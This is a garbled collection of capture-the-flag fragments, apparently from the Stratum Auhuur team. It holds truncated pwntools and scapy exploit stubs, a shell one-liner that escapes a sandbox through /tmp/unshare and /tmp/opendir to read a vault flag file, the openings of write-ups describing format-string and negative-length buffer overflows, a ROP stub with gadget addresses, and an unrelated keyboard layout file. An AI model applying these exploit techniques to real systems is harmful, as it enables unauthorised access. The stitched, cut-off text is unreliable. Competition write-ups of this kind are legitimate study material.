#!/usr/bin/env python2
import pwn
import struct
import binascii
import base64
import time
local = False
#pwn.context(arch='x86_64', os='linux')
#!/usr/bin/env python
from socket import socket, AF_INET, SOCK_DGRAM, timeout
import hashlib
import time
import struct
from scapy.all import sendp, Ether, IPv6, UDP, Raw
from bitarray import bitarray
IP6 = PUT_TARGET_LINK_LOCAL_IPV6_HERE
#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
static void err_quit(const char * const msg) {
    puts(msg);
    exit(-1);
}
#!/bin/sh
echo 'sleep 600' | /tmp/unshare &
sleep 1;
echo 'echo -e "r\n/proc/self/fd/3/vault/flag" | /home/adam/vault_explorer' | /tmp/opendir /proc/$!/root
#!/usr/bin/env python
import pwn
import struct
def p(d):
    return struct.pack('<I', d)
host = 'shuffle.polictf.it'
port = 80
#!/usr/bin/env python
import pwn as p
import sys
import random
debug_enabled = len(sys.argv) > 1
def debug(s):
    if not debug_enabled:
From tsuro for Stratum Auhuur
==Stage 1==
ICBM was a two-stage challenge. The first stage was quite easy: there was a
network service running, the sample_collector, that read a filename from you in a
loop (you have to confirm), a number of "samples" n, and then n integers that
would be written onto the stack. The number n was bounds-checked so that it
could not be too big and overflow the buffer. There were two easy vulnerabilities
in here: the filename would be passed as the first argument to printf, and the
buffer could be overflowed by giving a negative value. We can use the format
From tsuro for Stratum Auhuur.
This challenge was a pwnable for 1000 points and it was a clone of the classic
game Sokoban, reimplemented with the help of ncurses. For everyone who doesn't
know what Sokoban is, it's an old 2D puzzle game (this is the time where you
should google for an image). You see your character from the top and have to
push boxes around to some marked destinations. Anyway, the pwnable was exactly
that game. If you solve level 6, you get the option to enter an infinite mode in
which you get levels assigned randomly.
==Reversing==
default
xkb_symbols "basic" {
    include "us(basic)"
    name[Group1]="Custom (EN-DE)";
    key <AE11> {[minus, underscore, ssharp, ssharp]};
    key <AD03> {[e, E, EuroSign, EuroSign]};
    key <AD11> {[bracketleft, braceleft, udiaeresis, Udiaeresis]};
    key <AC10> {[semicolon, colon, odiaeresis, Odiaeresis]};
    key <AC11> {[apostrophe, quotedbl, adiaeresis, Adiaeresis]};
#!/usr/bin/env python
import os
import struct
def pack(addr):
    return struct.pack("<Q", addr)
puts = 0x4009d0
gadget = 0x401583